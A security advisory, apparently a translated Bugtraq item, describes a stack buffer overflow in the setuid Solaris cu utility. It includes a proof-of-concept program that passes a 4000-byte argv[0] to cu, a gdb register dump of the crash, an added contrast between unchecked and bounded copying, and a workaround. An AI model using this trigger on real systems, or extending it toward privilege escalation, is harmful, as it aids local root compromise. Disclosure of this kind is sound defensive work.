Solaris cu Buffer Overflow Vulnerability

Published: 2001-01-27
Updated: 2001-01-27

Affected systems:

Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
Sun Solaris 2.5
Sun Solaris 2.4
Description:

BUGTRAQ ID: 2253

cu is a Unix communications utility. It is usually installed with elevated privileges so that it can access the communication hardware.

The /usr/bin/cu shipped with Solaris contains a buffer overflow vulnerability. When cu runs, it copies argv[0] into an internal buffer without performing any bounds check. If argv[0] is longer than the destination buffer, it overwrites adjacent data on the stack.

A local attacker exploiting this vulnerability may obtain the privileges of euid 'uucp'. This may in turn allow the attacker to obtain root privileges.
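As an added illustration (not code from the advisory, from Pablo Sor, or from Solaris), the copy-without-bounds-check pattern described above beside a bounded replacement that reports truncation; the buffer size PROGNAME_MAX and the function names are assumptions, since the advisory does not give cu's internals:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical reconstruction of the bug class the advisory describes: the
 * program name (argv[0]) is copied into a fixed internal buffer. The size
 * 256 is an assumption; the advisory does not give cu's real buffer size. */
#define PROGNAME_MAX 256

/* Vulnerable form: strcpy() with no length check. Any argv[0] of
 * PROGNAME_MAX bytes or more runs past the buffer and overwrites the
 * adjacent stack data, which is the crash seen in the advisory's demo. */
static void set_progname_unchecked(char *dst, const char *argv0)
{
    strcpy(dst, argv0);            /* overflow if strlen(argv0) >= PROGNAME_MAX */
}

/* Hardened form: copy at most dstsize-1 bytes, always NUL-terminate, and
 * report truncation so the caller can refuse to continue or log it.
 * Returns 0 when the whole name fit, -1 when it had to be cut. */
static int set_progname_bounded(char *dst, size_t dstsize, const char *argv0)
{
    size_t n = strlen(argv0);
    if (dstsize == 0)
        return -1;
    if (n >= dstsize) {
        memcpy(dst, argv0, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return -1;
    }
    memcpy(dst, argv0, n + 1);     /* includes the terminating NUL */
    return 0;
}

int main(void)
{
    char name[PROGNAME_MAX];
    /* Constructed input mirroring the advisory's demo: 3999 'A' bytes. */
    char *big = malloc(4000);
    if (big == NULL) return 1;
    memset(big, 'A', 3999);
    big[3999] = '\0';
    set_progname_unchecked(name, "cu");  /* short name: safe in both forms */
    printf("4000-byte argv[0]: rc=%d copied=%zu bytes\n",
           set_progname_bounded(name, sizeof name, big), strlen(name));
    free(big);
    return 0;
}
```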

<*Source: Pablo Sor (psor@afip.gov.ar) *>


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and education only. Use at your own risk!


Below is the test code and procedure provided by Pablo Sor:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char *buf;
    int len;

    if (argc != 2 || (len = atoi(argv[1])) < 1) {
        fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]);
        return 1;
    }
    /* build an argv[0] of len-1 'A' bytes and hand it to cu as its name */
    buf = malloc(len);
    if (buf == NULL) { perror("malloc"); return 1; }
    memset(buf, 0x41, len - 1);
    buf[len - 1] = 0;
    execl("/usr/bin/cu", buf, (char *)0);
    perror("execl");   /* only reached if exec fails */
    return 1;
}

$ uname -a
SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5

$ ./cu-demo 4000
Segmentation Fault (core dumped)

$ gdb ./cu-demo --core=core

GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.5.1"...
warning: core file may not match specified executable file.
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
#0  0xef62901c in ?? ()
(gdb) info registers
g0             0x0      0
g1             0xef628d24       -278754012
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x137a4  79780
o1             0xef792a88       -277271928
o2             0x0      0
o3             0x0      0
o4             0x0      0
o5             0xef792a88       -277271928
sp             0xefffecb0       -268440400
o7             0x31b48  203592
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81010100       -2130640640
l6             0x7      7
l7             0xef7927d4       -277272620
i0             0x39000  233472
i1             0xeffffec4       -268435772
i2             0x38088  229512
i3             0x41414141       1094795585
i4             0x2f     47
i5             0x0      0
fp             0xefffecf0       -268440336
i7             0x137a4  79780
y              0x0      0
psr            0x4400086        71303302
wim            0x0      0
tbr            0x0      0
pc             0xef62901c       -278753252
npc            0xef628ffc       -278753284
fpsr           0x0      0
cpsr           0x0      0

Recommendations:

Temporary workaround:

NSFOCUS recommends that you immediately remove the setuid bit from /usr/bin/cu.

Vendor patch:

None available.

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.